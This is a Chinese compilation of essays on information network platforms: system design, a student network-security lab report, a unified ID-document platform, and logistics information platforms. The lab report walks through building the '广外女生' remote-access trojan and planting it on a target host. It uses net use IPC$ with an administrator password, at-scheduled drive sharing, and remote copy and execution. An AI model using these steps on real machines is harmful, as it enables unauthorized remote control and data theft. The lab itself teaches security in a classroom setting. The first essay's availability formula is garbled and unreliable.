信息网络平台(通用12篇)
信息网络平台 篇1
1、信息系统简述
1.1 信息系统概念
信息系统是由计算机硬件、网络和通讯设备、计算机软件、信息资源、信息用户和规章制度组成的以处理信息流为目的的人机一体化系统。
1.2 信息系统功能
信息系统的五个基本功能:输入、存储、处理、输出和控制。
输入功能:信息系统的输入功能决定于系统所要达到的目的及系统的能力和信息环境的许可。
存储功能:存储功能指的是系统存储各种信息资料和数据的能力。
处理功能:数据处理工具:基于数据仓库技术的联机分析处理 (OLAP) 和数据挖掘 (DM) 技术。
输出功能:信息系统的各种功能都是为了保证最终实现最佳的输出功能。
控制功能:对构成系统的各种信息处理设备进行控制和管理, 对整个信息加工、处理、传输、输出等环节通过各种程序进行控制。
1.3 信息系统类型
从信息系统的发展和系统特点来看, 可分为数据处理系统、管理信息系统、决策支持系统、专家系统和虚拟办公室五种类型。
1.4 网络信息系统的结构模式
国际标准化组织ISO在1979年提出了用于开放系统体系结构的开放系统互连 (Open System Interconnection, OSI) 模型。这是一种定义连接异种计算机的标准体系结构。信息系统的结构模式有集中式的结构模式、客户机/服务器 (C/S) 结构模式、浏览器/服务器 (B/S) 结构模式和P2P体系结构四种。
2、信息系统设计概述
2.1 信息系统设计的任务
系统设计的任务就是依据系统分析文档资料, 采用正确的方法来确定系统各功能模块在计算机内应该由哪些程序组成, 它们之间用什么方式联结在一起以构成一个最好的系统机内结构, 同时还要使用一定的工具将所设计的成果表达出来, 另外考虑到实现系统功能的需要, 还要进行数据库的详细设计、编码设计、输入/输出界面 (人—机界面) 设计等等。
2.2 信息系统设计步骤
进行数据库的物理设计。根据总体方案及系统分析的实际需求, 考虑数据库的存储方式 (集中式或分布式) ;考虑物理库的数量及每一个物理库所包含的数据库表的内容;从查询处理效率等方面考虑数据库表的索引问题等等。
进行编码设计。编码是系统的重要组成部分, 与数据的规范性和交换性密切相关, 编码一旦被设计处理将会永久使用并常驻于数据库中, 因此需要在系统设计阶段给出具有永久性、稳定性的编码设计方案。
进行界面设计。构造良好的界面是未来系统能够顺利运行的重要前提, 要使信息系统使用起来更加舒适、更加高效就需要在界面设计方面具有一个全新的设计策略, 这个设计策略要在程序设计之前完成。
进行系统功能设计。功能设计是在前面所有工作基础上进行的, 它主要是采用“自顶向下”的原则考虑模块的划分与设计, 使模块内部以及模块与模块之间的连接具有合理的结构。功能设计结果的表达方式可以有两种:一种是利用“结构图”来描述模块的功能和模块之间的信息交换;另一种是用Rational Rose工具来描述。功能设计中通常有一组评价标准来对设计结果进行评价, 同时使用一组设计原则对系统模块进行优化设计。
2.3 信息系统设计可行性标准
运行效率:系统的运行效率受多方面因素, 如:硬件、编码设计、数据库设计、系统逻辑模式设计等。所以要提高系统运行效率时, 应从以上方面全面着手, 切不可抓着单一模块想要提高整体运行效率。
可靠性:因为信息系统是需要与用户交互的平台, 所以往往需要用户输入大量的信息, 而人工输入信息就难免会出现各样的错误, 为保证系统能够持久的运行就需要在编码阶段设计一套完整的逻辑模块 (如:校验码、批量控制、建立运行日志和信息追踪、文件的存取限制等) 来过滤、排除、解决可能出现的一切错误, 并且预估出“平均故障间隔时间”和“平均修复时间”, 从而得出“系统的有效时间”=“平均故障时间”/“平均修复时间”, 以保证系统长期良好健康的运行。
可修改性:由于系统是在一个实际的客观环境中运行, 它的数据来自于客观现实, 而客观世界是在不断地变化的, 它导致客观数据的变化和功能需求的变化, 为了适应这种不断变化需求, 必然要求信息系统也随之而变化, 即对信息系统做相应的修改。
灵活性:由于计算机技术在不断地发展, 硬件价格越来越便宜, 新的操作系统和程序语言在不断地出现或升级, 计算机网络技术和通讯技术也在不断地发展, 这些必然对信息系统产生影响, 迫使用户考虑使用新的技术、更新设备、提高系统运行效率、完善系统功能等等。
通用性/实用性:现如今的操作系统已经不再仅仅是windows一种系统了。如:DOS、Windows、UNIX、Linux、OS/2、Mac OS、Novell Net Ware等操作系统。无论在那种系统下开发信息系统, 因为我们无法预知用户使用的是那种操作系统, 所以设计时不能针对单一操作系统, 而要综合考虑到所开发的系统在任何操作系统的通用性。
2.4 数据库设计
用户权限的设计:数据库用户权限的设计, 需要根据实际系统所面对客户的实际情况来进行针对客户的权限区分、类别划分、操作限制等用户权限的设计。
索引文件的设计:索引是按某种规则建立记录的逻辑顺序。根据索引文件所含索引的个数将索引文件分为单索引文件与复合索引文件。根据索引关键字取值的限制将索引分为主索引、候选索引、唯一索引与普通索引。
中间文件或临时文件的设计:在数据的存储中不仅仅可以将数据添加到数据库中, 比如用户上传的图片或者文件等需要写成文件流才能存储进数据库的文件就无需保存进数据库, 这类型文件保存进数据库反而会很慢。所以将其直接保存入电脑硬盘或者将一些信息直接写入临时文件, 只要设定好逻辑程序定期清理这些中间文件或临时文件即可。
视图 (View) 的设计:与在任何关系数据库中一样, 索引对数据仓库的性能具有重要作用。每个维度表都必须在主键上建立索引。在其它列 (如标识层次结构级别的列) 上, 索引对某些专用查询的性能也很有用。事实数据表必须在由维度表外键构成的组合主键上建立索引。
2.5 编码设计
程序编码可谓是一个系统的核心所在, 程序代码的质量直接影响系统的质量, 所以编写代码时必须非常严谨的按照一定的逻辑来编写, 以保证代码质量。
2.6 界面设计
风格设计:系统的风格要在系统开发前就确立下来, 负责各模块的相关人士应严格按照预定的风格设计自己的模块。系统风格力求简明扼要, 不能设计过于繁琐, 让人有种很烦的感觉;同时又不能太过简单, 让用户觉得不够充实。所以设计风格时要在简约的同时不失内涵。
导航设计:为了使系统能够更好地工作, 在导航上必须要有充分的提示来说明哪一部分是用来操作的以及它们是如何操作的, 提示用户如何实现人机交互, 这就是功能的可见性。为了在设计中实现可见性, 每一项功能及其操作方法对于界面所处环境中的大多数用户来说必须是显而易见的, 只需看一眼就可以有所了解, 具有这种特点的控制方法成为“可供性”, 可供性提供了大量的和操作有关的线索。
可靠性设计:减少操作错误的措施:输入操作符应尽可能简单、易记忆, 提示要简短、明了。
目标:界面是系统的感知器官。系统的界面应尽量满足以下要求:简单性、可靠性、易学习与易使用性、立即反馈性等特性。
2.7 功能模块设计
系统功能设计的基本方法是利用结构图来描述系统设计结果, 首先使用一组设计策略将系统分析阶段所形成的逻辑结构 (数据流程图) 转换成初始的结构图, 然后使用一组设计原则和一组评价标准对初始结构图进行优化设计, 最终形成具有良好结构的功能设计方案。
模块是具有四种属性的一组程序语句, 这四个属性分别是输入/输出、逻辑功能、运行程序、内部数据。
功能模块设计优化。 (1) 模块之间的耦合原则。影响模块之间耦合程度的最主要因素是模块之间信息传递的复杂性。如果两个模块之间仅存在调用与被调用关系, 在它们之间没有任何的信息传递, 这表示两个模块的耦合程度最低, 称作简单耦合。 (2) 模块内聚性原则。所谓模块内部的“组成部分”是指该模块运行程序中的一个动作、一组指令或一个调用其它模块的语句。内聚性是度量模块功能强度的一个相对指标, 主要表现在模块内部各组成部分为了执行处理功能而组合在一起的相关程度, 即组合强度。 (3) 模块的分析原则。模块的分解是指把一个模块分解成若干个从属于它的新模块。在分解一个大模块时, 不能单凭语句条数的多少, 而主要是按功能进行分解, 直到无法做出明确的功能定义为止。在分解时既要考虑到模块的内聚性, 又要考虑到模块之间的耦合程度, 并在这两者之间选择一个最佳的方案。
摘要:本文首先介绍了信息系统的相关节本信息, 紧接着详细讲解了信息系统开发个步骤以及在开发各步骤的过程中应该注意的事项。就一个web社区网站的开发为实例简单演示一下信息系统平台的开发流程。在模式上本次开发的项目选择为B/S的浏览器/服务器器模式。最后引以简单的实例以帮助大家了解信息系统开发的流程。
关键词:信息系统,设计,功能模块,平台沟通
参考文献
[1]姜惠民, 刘宝庆, 杨亚洲, 苏东梅著.《网络组建与互联》.北京:电子工业出版社, 2009年版.
[2]石硕著.《网络操作系统实用教程——Windows 2000 Sever Linux/UNIX及其异构网络的互联》.北京:清华大学出版社, 2008年版.
[3]张凌杰, 齐英兰著.《计算机网络基础》.西安:西北大学出版社, 2007年版.
[4] (美) 特南鲍姆 (Tanenbaum.A.S) 著潘爱民译.《计算机网络》.北京:清华大学出版社, 2004年版.
[5]陆玉库著.《最新网络通信协议》.北京:电子工业出版社, 2004年版.
信息网络平台 篇2
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
证件合一网络信息平台的构建 篇3
[作者简介]李冠亚(1992—),男,河南省周口市人,中国人民公安大学学生,主要研究方向:治安。
[文章编号]1009-3729(2014)04-0071-04
[摘 要]证件合一是针对当前社会居民持有的证件繁杂众多、使用流程复杂低效的现状而提出的简化证件、合众为一的构想,其背后的支撑或实质则是证件合一的网络信息平台。鉴于证件合一网络信息平台构建过程中存在牵扯部门众多、需要规模庞大的软硬件支持、公民个人信息安全问题严峻、信息众多导致录入维护困难、立法滞后等制约因素,建议采取如下应对措施:权威部门牵头,组织协调相关部门合力共建;加大资金投入力度,整合利用原有资源;在保障信息安全的基础上,按照生命轨迹,不间断并有条理地收录、维护公民个人信息;完善相关立法。
[关键词]证件合一;网络信息平台;电子证件;信息安全
[中图分类号]D192.1;F49;TP309 [文献标志码]A [DOI]10.3969/j.issn.1009-3729.2014.04.014
当今社会,人们在享受网络信息化带来的方便快捷高效生活的同时,又深深地被证件系统方面的种种不便所困扰。具体来说,就是各种证件种类繁杂、颁发重复、功能重合,这既带来携带不便、办理困难的困扰,又因使用低效而造成资源浪费。从政策和理论上来说,制作和颁发每一种证件的初衷都是把证件当作服务的工具,保障群众享受相关的权利,但由于证件越发越滥,最终造成其使用效果事与愿违。[1]与此同时,与证件有关的一些服务性系统如金融系统、安检管理系统、服务性的登记系统(如就医时的患者信息录入系统)却与相关证件没有太多软件与硬件上的联系。这样,一方面造成服务性系统收录、核实用户信息耗费大量时间、精力与财力,自身的服务能力弱化,政府职能部门、企事业单位的效益低下;另一方面也给公民带来诸多不便,使其失去了本应享有的高品质现代服务。目前,学界有关证件合一网络信息平台的研究主要涉及其微观方面,涵盖电子证件的信息硬件支撑、安全防伪技术、信用制度、隐私保护与立法研究,而缺乏对证件合一网络信息平台本身构建的系统性研究。本文拟在对证件合一网络信息平台的概念、组成部分、运行方式、可能面临的问题及其对策进行初探,以期有助于证件合一网络信息平台建设,更好地为民众提供优质高效服务。
一、证件合一网络信息平台概述
证件合一是指将功能相同或联系紧密的证件整合统一,简化居民持有证件的种类、数量,加强发证机关、部门之间的联系合作,使其所掌握的证件信息共享,以方便公民的日常生活,提高政府相关职能部门和具有服务性质的企事业单位的工作效率,降低其运作成本的一种证件措施。具体来说,证件合一就是将现有的所有证件按照不同功能划分成几大类,将原先各种证件所包含的信息进一步整合完善,并针对性地只颁发几类实体证件。为此,需要构建一个包含软件与硬件的庞大的网络信息系统平台。这一平台由以下几部分构成,即存储各类证件信息的信息数据库、各级维护信息平台运行的具有不同管理控制权限的分中心、各种权限等级的数据收录与获取的终端,以及连接以上所有系统与各个社会上现存的拥有具体功能的企事业单位等子系统的高速主干网、次级网络和局域网。这样公民就可以在办理各种业务、出入各种场所时,凭借其随身携带的几个证件和一些附带的身份识别技术,在各种终端登录验证,凭借背后的数据库与高速网络来高效快捷地办理各种业务。
在当今信息化社会,证件合一的表面形式只不过是公民所持有的实体证件的减少,其背后的支撑或实质则是证件所含不同种类信息的交汇处理平台,即证件合一的网络信息平台。证件合一就是要求各种证件发证机关将各自所掌握的相关信息实现共享,一起构建一个动态的信息收集、处理、存储与应用的共享平台。简单来说,证件合一网络信息平台就是一个连接众多职能部门与服务机关的信息网络数据库。例如公民持有的一张与医疗、劳动就业、保险、保健相关的证件,其功能涉及公民在进行有关医疗、劳动就业保障、获取和支付保险,以及个人保健的过程中所进行的身份核实认证、相关服务信息的录入登记等。证件合一中有关公民的所有信息由之前的各个部门系统所掌管转变为信息共享,可以指定其中的一个单位、部门进行信息的收集、录入与维护,也可以共同进行,使经过初步整理的信息可以在一个平台上共享。这样一来,居民在获得医疗服务时,由医疗服务单位收集到的本居民的医疗信息能及时上传更新到一个其他部门能够收到的信息平台上。当公民在办理、支付医疗保险时,相关保险机构只要通过该公民持有的证件核实一下该公民身份,就可以获得该公民详细而又准确的医疗信息,能在节约调查核实医疗信息所耗费的时间、精力与费用的基础上及时为公民办理保险业务,当然相关的保险信息也要及时上传到共享信息平台上。以此类推,劳动部门、保健机构也可及时获得相关信息,高效且低成本地完成与该公民相关的服务业务办理。
二、证件合一网络信息平台构建过程中的制约因素
证件合一网络信息平台的应用前景广阔,但要实现这一重大系统工程需要面对诸多问题与挑战,存在很多制约因素。具体说来,主要有以下几个方面。
1.涉及部门众多
证件合一网络信息平台的构建是一项巨大的系统工程,其所需信息来源多、分布广,在其构建过程中必定会涉及众多部门。除去原有颁发证件的部门外,还涉及许多服务性事业单位、公司、组织、行业协会、团体和支持这一平台本身的部门,大到公安系统、财政系统和交通系统,小到小区门卫、公路收费站和医院挂号处。所有涉及到的信息部门在整合各自信息时首先面对的就是技术的标准化问题。每个部门在证件信息的录入、整理、存储和应用时都有一套自己的技术标准,在整合时,依照谁的标准、以谁为主势必会产生一些分歧。与此同时,整合完成后由谁来主导证件合一后的信息工作,即由谁来负总责也会经过众多部门的博弈。如果没有一个强有力的部门统一领导,证件合一网络信息平台是无法构建起来的。
证件合一网络信息平台的构建是一个庞大的系统工程,涉及的方面众多,这是由其本身功能所决定的。因为它所服务的对象是广大公民,其所服务的内容涉及到居民工作、生活的方方面面。这就需要其所含信息要满足所有涉及到的系统的需要,而之前受到技术水平、生产力水平的限制,这些信息只能由不同系统部门分别或共同掌握。
2.需要规模庞大的软硬件支持
证件合一网络信息平台的构建需要规模庞大的软硬件支持,而这些软硬件背后则需要强大的技术储备和巨额资金的支持。不仅是建设初期,而且系统真正运行起来后的定期软件更新、不间断的设备维护,还需要数量众多的专业技术人员和持久稳定的资金注入。虽说证件合一网络信息平台的构建需要巨大的软硬件支持,但远远低于证件合一之前分散于各个部门系统的软硬件所耗费的资源,因为各个系统部门占用大量软硬件、重复建设浪费了大量资源。因此,从长期来看,证件合一网络信息平台的构建有利于优化资源配置,节约资源。
3.公民个人信息安全问题严峻
从公民个人隐私的种类来看,可以将其分为个人事务、个人信息和个人领域3类。[2]证件合一网络信息系统不仅涉及个人信息,还涉及个人事务、个人领域。把原来众多的证件信息综合于一体,甚至还会增加一些个人信息,这样的个人资料将联网式地被各个部门、单位、企业等应用,很容易被获取、另作他用。这样完备的公民个人信息极易被侵犯,却还不容易确定是被谁侵犯的。同时,作为证件合一之后出现的有限的几种证件(极其重要的个人凭证)一旦丢失,也就意味着证件的拥有者将不再拥有他其他所有的凭证,而拾到证件的人就拥有了一个新的身份和享有其他服务的凭证。
关于公民的信息安全,首先要明确一点,就是信息安全与信息传播的便捷性成反比。长期以来就有关于公民信息安全的无休止的争论,在这里我们应先搁置这些争论,在保证公民个人信息安全的同时,尽可能地为信息传播清除障碍,即在构建证件合一网络信息平台的过程中,找到信息安全与高效应用的平衡点。
4.信息录入维护困难
证件合一后,需要大量的个人信息(从出生日到当前阶段)用于给众多部门和服务性系统提供支持。例如公民的人身信息、金融信息、医疗教育信息、职业信息、诚信记录等。同时由于信息具有时效性,是不断发展变化的,所以就需要及时、不间断地收录、维护。信息录入维护困难的主要原因就是之前没有进行过系统的录入、定期的录入,具体表现就是各个系统部门各管各的,不定期地收集,致使信息重复收录且在时间节点上不具有连续性。这也是导致资源浪费与办理低效的原因之一。
5.立法滞后问题
证件合一网络信息平台的构建在立法层面上面临非常尴尬的境地:一是证件合一这一新兴的证件运行管理模式本身没有法律指导;二是证件合一所主要依靠的基础即网络信息在立法环节上与其自身的发展速度相比相对滞后,在许多重要方面基本上处于空白状态,很多网络信息行为在无任何法律法规约束下自由进行;三是现行的各种法律法规有的已经明显不适应社会发展需要,有关网络安全、信息认证、加密等方面的法律法规没有及时跟进,对网络犯罪的预防、监管、责任追究等也缺乏完备的法律依据。[3]尤其需要注意的是,网络安全同样缺乏法律保障,与之相对应的规范化管理制度建设相对滞后,从而造成网络安全管理漏洞,在立法方面存在网络信息安全隐患。
三、构建证件合一网络信息平台的建议
1.权威部门牵头,组织协调相关部门合力共建
构建证件合一网络信息平台需要众多部门协商、协调,因此首先要寻求国家层面的帮助、民众的广泛支持。这需要相关专家在广泛调研和充分论证的基础上提出完整、有效的构建思路,形成具体、成熟的构建方案,以获得政府和民众的支持,进而制定颁发相关法律法规,组建专门建设、管理该平台的部门或者是指定现有的权威部门牵头协调组织各部门系统进行建设、运行。为了保证证件合一网络信息平台建设的可靠性、可控性、效用性,可以先在部分地区进行试点,整合一部分证件功能,连接一部分系统,之后再逐步推进完善。
2.加大资金投入力度,整合利用原有资源
证件合一网络信息平台属于公共设施建设,构建这一平台投入大、见效慢、风险高,须由国家来进行强有力的统一协调,并由各个子系统、部门尤其是获益单位的共同努力来解决。从短期来看,将分散的证件信息收集整合,建设新的数据库、信息传输网络和证件信息终端会耗费大量的资金,但是从长远来看,这是一个资源优化配置的过程,一旦新的体系建立起来,在其运行过程中可以节省大量的资金。因此前期的资金投入是值得的。此外,构筑证件合一网络信息平台所需要的软硬件资源还可以从其他部门原有的硬件设备和技术人才整合中获取,可以对其他部门的硬件设备按照新的要求进行改造,成为新系统的一部分;还可以对原先分散于各个部门进行证件信息维护的专业技术人员进行统一的培训。这样既节省费用,又不浪费原有资源。
3.保障信息安全
可用一句大白话来描述如何平衡信息安全与高效应用问题——让该知情的人尽快知情,把不该知情者的路堵死。证件合一网络信息平台中的信息安全主要面临2方面危险,即“天灾”和“人祸”。“天灾”就是网络运行设备遇到自然原因而出现的问题。为应对“天灾”我们应注重数据库备份的建设,采用双机并行和多级网络结构,可以把存有重要证件信息的数据分存到几个数据库中,并将巨型数据库分散于不同地理区域中,通过通信网络将其连接。此外,应把证件信息平台的实体网络划分成多级别多层次多部分,形成相对独立的结构;每个部门的子系统、终端设备应有相应的权限设置,使其只能在权限内获取一部分信息。只有这样,才能实现网络设备的物理隔绝、单向运行、数据分流,确保各应用部门严格分离。“人祸”是指信息管理维护过程、信息资源传递过程、信息应用过程中各方面人员(包括黑客)对公民信息的窃取、破坏,以及公民自身因丢失、损坏证件设备,致使自身信息受到侵犯。为防止“人祸”,首先,在获取信息之前要确保通过一定级别的第三方认证;其次,每一个接触公民信息的单位或个人必须有相应权限和充足的理由,且在使用信息的过程中由本单位负责人监督、负责,每一次使用都有事后可查的记录。除此之外,还应建立行之有效的证件识别(包括对携带证件者本人的识别,如面部、指纹识别等)和挂失冻结制度等。
4.按照生命轨迹,不间断、有条理地收录、维护公民个人信息
个人信息要从个人生命的起点开始,按照生命的轨迹不间断且有条理地收集、维护。一种设想是从公民的出生开始,有关他的出生信息、生理特征就无差别地记录到他本人的证件之中,通过医院的证件信息收集终端传送到证件合一网络信息平台上;伴随其生命轨迹的运行,在进行每一次涉及身份认证业务活动的同时,与此相关的准确信息也同时记录在证件合一网络信息平台上。这样,收集和维护信息就变得简单,公民每使用一次证件、办理任何一项业务都是一次信息采集、更新和维护的过程。
5.完善相关立法
法律规章是确保证件合一网络信息平台运行的基础,从法律层面上给予证件合一网络信息平台一个法律身份,一方面可以规范其运行方式、程序,明确其中的权责关系;另一方面可以给予参与其中的各方(包括公民、各管理服务机构)以信心,为其提供法律保障。这样,参与各方会在法律框架下进行各种有关证件的活动,解决出现的各种问题,公民也会放心地将自己的信息交给证件合一网络信息平台,平台的管理部门也会权责明确地参与其中。有关证件合一网络信息平台的相关立法主要涉及居民证件信息保护、居民个人信息收集、信息管理部门的信息处理与使用权限,以及救济途径4个方面的法律规定。
四、结语
综上所述,证件合一网络信息平台的构建虽然面临着种种问题与挑战,但是构成这一平台无论是从技术层面还是从社会实践层面来看条件都已具备,是社会经济政治的快速运行以及公民生活的迫切需求,是信息化社会的必然结果。当然,证件合一网络信息平台的构建需要相关专家在广泛调研和充分论证的基础上提出完整、有效的构建思路,形成具体、成熟的构建方案,获得政府和民众的广泛支持,制定、颁发相关法律法规。
此外,证件合一网络信息平台的构建还需要注意以下2点:
其一,证件合一不是简单地把所有证件合为一种,而是按照科学的分类标准划分成几类,每一类实行一种证件;其二,证件合一还包含将众多系统转化为一个大系统中的若干子系统,例如将凭证系统、支付系统、诚信系统、地理信息系统等融合成为一个有机的大系统,以现代网络信息化背景下的数据库和高速网络通道为依托,综合、高效、科学地为参与其中的每位成员提供多方位的信息服务和支持。
[参 考 文 献]
[1]张蕾.减少证件种类,优化证件功能[N].亚洲中心时报(汉),2009-04-28(002).
[2] 吕欣,高枫.电子政务信息共享中的隐私保护问题研究[J].信息网络安全,2012(8):188.
信息网络平台 篇4
物流公共信息平台现状
近些年来,借助政策的东风,在协会和地方政府的主导之下,全国各地的物流公共信息平台如雨后春笋般出现,很多省市都建立了区域性物流信息平台。
在调查中记者了解到,当前不少物流公共信息就平台功能设置上,还是局限在为车主找货,为货主找车的传统模式上。在传统的物流行业中存在着不少的配货站,这些配货站的主要功能就是撮合交易,为货主找车主,为车主找货主,多数的货运司机已经习惯了这种传统的信息获取模式,要想将这部分客户群体和需求转移到平台上来需要时间。
我国的物流公共信息平台建设仍然处在初级阶段,多数是企业自建平台和政府主导区域性平台。由于各个地方和每个企业自身情况各有不同,所以当下物流公共信息平台在设计上花样百出,彼此在数据接口设计上各有不同,因此很难实现物流信息的真正共享。
据中国物流与采购联合会网络事业部2013年的调查样本显示,被调查的企业中,超过97%的企业建有自己的门户网站 /信息平台;其中,大多门户网站 /信息平台的用途仍是单纯定位在信息发布上,只有15.3%的企业将电子交易纳入其中并逐步推行应用。
与此同时,出于满足自身企业发展的需要,一些上规模的物流企业也将触角伸到物流公共信息平台建设上来,这类平台多数以企业名称冠名。就功能来说,这类平台可以初步实现车源、货源、配载等信息的发布、查询、人才招聘、集成GPRS系统功能,有的还有物流手机短信功能、网络通话功能等。但是由于业态类似,这类平台形式相对单一,受众面多重合且竞争激烈。
如今的物流市场,依赖传统模式的客户群体占到整个物流企业的大部分,无法形成有效的交易量使得大部分的物流公共信息平台建成之后就被放在那里。尽管这样,物流市场这块蛋糕太大了,至今仍在吸引有关部门打造自己的物流公共信息平台,徒增资源的浪费。
有形之手博弈无形之手
据了解,政府投资物流公共信息平台,很少考虑经济效益,所以在平台的设置上脱离市场的现象普遍存在。这些政府投资的平台,定位在公共服务上面,但却不允许客户自由选择,必须按照政府规定选择,于是我们看到千辛万苦打造出来的平台,其所提供的服务与客户的需求脱节,致使平台最终沦为摆设品。
与此同时,在诚信缺失的情况下,客户对平台望而却步。对于不少物流企业和车主而言,宁可付一笔中介费也要找配货站来完成交易,原因就是对物流公共信息平台诚信环境的不信任。
对不少企业而言,迫切需要解决的是找货难和降低物流成本,可是由于对网络环境的不信任和现实交易中丢货现象时有发生,使得许多真正有物流需求的客户难以通过平台来实现。“不是不想要,只是不敢接触”,这就是当前物流公共信息平台遭遇信任危机的写照。
在信息平台的建设中,表面上都在打着集约化的大旗,可实则却在走“垄断”之路。中国物流学会常务副会长戴定一在接受记者采访时表示:“现在有些‘平台’,特别是一些有政府背景的‘平台’,都希望以行政的背景在一个地区内实现垄断服务。”
